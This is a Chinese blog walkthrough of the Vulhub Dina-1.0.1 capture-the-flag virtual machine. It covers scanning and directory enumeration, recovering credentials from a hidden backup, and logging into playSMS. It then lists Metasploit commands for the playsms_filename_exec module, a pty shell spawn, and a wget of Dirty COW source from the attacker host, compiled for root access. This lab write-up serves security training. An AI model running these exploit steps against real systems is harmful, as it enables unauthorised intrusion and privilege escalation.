Vulhub靶场之Dina-1.0.1

Vulhub靶场之Dina-1.0.1

靶机描述

ctf类的靶机,目标是获取/root/flag.txt

环境准备

vmware15 打开
攻击机:kali   NAT模式 10.10.10.128
靶机:Dina1.0.1		NAT模式  10.10.10.144

解题过程

1、nmap扫描获取存活主机
nmap -sP 10.10.10.0/24
靶机IP:10.10.10.144
2、nmap扫描获取靶机信息
nmap -sV -O 10.10.10.144
开放了80端口、linux内核版本在2.6.32-3.5
开放了80端口
3、按照惯例,查看robots.txt
在这里插入图片描述
4、对robots里的内容逐一查看并查看源码,发现nothing源码内有类似密码的东西
在这里插入图片描述
在这里插入图片描述

5、打开web,使用dirsearch对该web后台进行扫描
python3 dirsearch.py -u http://10.10.10.144


在这里插入图片描述
6、分别查看http://10.10.10.144/uploads/、http://10.10.10.144/tmp/、http://10.10.10.144/secure,发现secure中有backup.zip压缩包
在这里插入图片描述
7、将其下载下来,发现里面是一个mp3格式的文件,解压需要密码
在这里插入图片描述
8、使用nothing中获取到的源码逐一尝试(freedom为正确密码),解压完后发现,以mp3格式打开报错,于是尝试010editor打开,发现一串内容。
在这里插入图片描述
提示三个信息:
(1)密码是简单密码,与creds backup file有关
(2)用户名是touhid
(3)一段URL:/SecreTSMSgatwayLogin

9、打开该URL,是一个playsms类型的网站的登录界面,尝试使用用户名touhid,密码是nothing源码提示的密码(密码为diana),登陆成功
在这里插入图片描述
10、寻找文件上传点等漏洞,尝试能否传马。
在这里插入图片描述
11、或者直接msf利用playsms的相关攻击模块,并设置相关参数

search playsms
use exploit/multi/http/playsms_filename_exec   
show options
set rhosts 10.10.10.144
set targeturi /SecreTSMSgatwayLogin
set username touhid
set password diana
set lhost 10.10.10.128

在这里插入图片描述
12、执行成功后,获得meterpreter通道,进入shell,需要设置虚拟终端

python -c "import pty;pty.spawn('/bin/bash');"  #linux系统的终端(信息收集时知道靶机是linux系统)

在这里插入图片描述
13、此时,获得的是普通的web账户的权限,需要进行提权。
这里因为前期信息收集已知linux内核版本是2.6-3.5的,因此尝试脏牛提权。

wget http://10.10.10.128/dirty.c  #开启kali的apache服务,通过wget的方式下载脏牛源文件
service apache2 start #开启kali apache,将源文件放到网站根目录下

14、发现当前目录下没有权限读写下载文件,于是在其他目录上下载,比如tmp目录
在这里插入图片描述
在这里插入图片描述
15、编译该文件,并执行

gcc -pthread dirty.c -o dirty -lcrypt

在这里插入图片描述在这里插入图片描述
16、切换成管理员用户firefart,并获取flag.txt文件
在这里插入图片描述
在这里插入图片描述

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值